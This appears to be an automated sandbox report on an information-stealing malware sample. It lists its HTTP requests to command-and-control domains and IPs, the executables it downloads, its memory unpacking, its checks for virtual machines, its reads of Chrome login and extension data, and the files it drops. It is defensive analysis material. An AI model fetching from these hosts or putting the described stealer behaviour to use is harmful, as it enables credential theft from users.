__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ce exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6350 exception.address: 0x4018ce registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (19 events)

suspicious_features	POST method with no referer header	suspicious_request	POST http://danielmi.ac.ug/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/softokn3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://74.119.195.134/
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/6ba72ceafccb01eee167d7aa09187085192abe6a
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/sqlite3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/freebl3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/mozglue.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/msvcp140.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/nss3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/vcruntime140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/1e6e1f91bf2fd97f39bb3794f23f972b62daf99d
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/main.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://danielmax.ac.ug/
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.77/ac.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.77/rc.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.77/ds1.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.77/ds2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.77/cc.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://telete.in/brikitiki

Performs some HTTP requests (21 events)

request	POST http://danielmi.ac.ug/index.php
request	POST http://danielmax.ac.ug/softokn3.dll
request	POST http://74.119.195.134/
request	GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/6ba72ceafccb01eee167d7aa09187085192abe6a
request	POST http://danielmax.ac.ug/sqlite3.dll
request	POST http://danielmax.ac.ug/freebl3.dll
request	POST http://danielmax.ac.ug/mozglue.dll
request	POST http://danielmax.ac.ug/msvcp140.dll
request	POST http://danielmax.ac.ug/nss3.dll
request	POST http://danielmax.ac.ug/vcruntime140.dll
request	GET http://74.119.195.134//l/f/K-R3vHoBagrSXdgRybk2/1e6e1f91bf2fd97f39bb3794f23f972b62daf99d
request	POST http://danielmax.ac.ug/main.php
request	POST http://danielmax.ac.ug/
request	GET http://185.215.113.77/ac.exe
request	GET http://185.215.113.77/rc.exe
request	GET http://185.215.113.77/ds1.exe
request	GET http://185.215.113.77/ds2.exe
request	GET http://185.215.113.77/cc.exe
request	GET https://telete.in/brikitiki
request	GET https://cdn.discordapp.com/attachments/873891971998036042/873892046249799720/Jjdsdprkpedcmpxtmnbemyveeqogpvi
request	GET https://cdn.discordapp.com/attachments/873891971998036042/873892704155742258/Bdojytwvbcgagbvmwkdspythmuhhgvq

Sends data using the HTTP POST Method (11 events)

request	POST http://danielmi.ac.ug/index.php
request	POST http://danielmax.ac.ug/softokn3.dll
request	POST http://74.119.195.134/
request	POST http://danielmax.ac.ug/sqlite3.dll
request	POST http://danielmax.ac.ug/freebl3.dll
request	POST http://danielmax.ac.ug/mozglue.dll
request	POST http://danielmax.ac.ug/msvcp140.dll
request	POST http://danielmax.ac.ug/nss3.dll
request	POST http://danielmax.ac.ug/vcruntime140.dll
request	POST http://danielmax.ac.ug/main.php
request	POST http://danielmax.ac.ug/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 315 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01d60000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2260 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x032e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1836 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2084 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:27 a.m.	process_identifier: 1812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 1632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773bf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f2c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f2c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02010000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 2412 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceW Aug. 9, 2021, 9:26 a.m.	number_of_free_clusters: 3349548 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \\?\Volume{c2d901c4-0706-11e8-912e-806e6f6e6963}\ total_number_of_clusters: 8362495	1	1	0
GetDiskFreeSpaceExW Aug. 9, 2021, 9:27 a.m.	total_number_of_free_bytes: 13715279872 free_bytes_available: 13715279872 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Steals private information from local Internet browsers (50 out of 1331 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\kn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\pt_PT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ru\messages.json
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\manifest.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_metadata\verified_contents.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ja
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\zh_TW\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_TW\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hi\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\mr\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\uk\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ta
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\te
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\tr\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\th
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\zh\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\pt_PT\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\id\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\tr

Creates executable files on the filesystem (50 out of 83 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll
file	C:\ProgramData\vcruntime140.dll
file	C:\Users\Public\Libraries\Jjdsdpr\Jjdsdpr.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll
